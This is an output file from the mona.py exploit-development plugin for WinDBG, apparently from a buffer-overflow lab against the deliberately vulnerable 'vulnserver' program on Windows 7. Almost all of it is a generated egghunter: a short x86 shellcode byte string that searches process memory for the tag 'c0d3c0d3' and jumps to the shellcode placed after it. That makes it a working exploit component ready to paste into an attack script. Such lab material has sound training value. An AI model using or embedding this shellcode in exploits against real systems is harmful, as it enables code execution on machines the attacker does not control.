================================================================================
  Output generated by mona.py v2.0, rev 605 - WinDBG
  Corelan Team - https://www.corelan.be
================================================================================
  OS : win7, release 6.1.7601
  Process being debugged : vulnserver (pid 3604)
  Current mona arguments: C:\Program Files\Windows Kits\10\Debuggers\x86\mona.py egg -t c0d3
================================================================================
  2020-05-18 10:22:08
================================================================================
Egghunter , tag c0d3 : 
"\x90\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
"\x74\xef\xb8\x63\x30\x64\x33\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff"
"\xe7"
Put this tag in front of your shellcode : c0d3c0d3
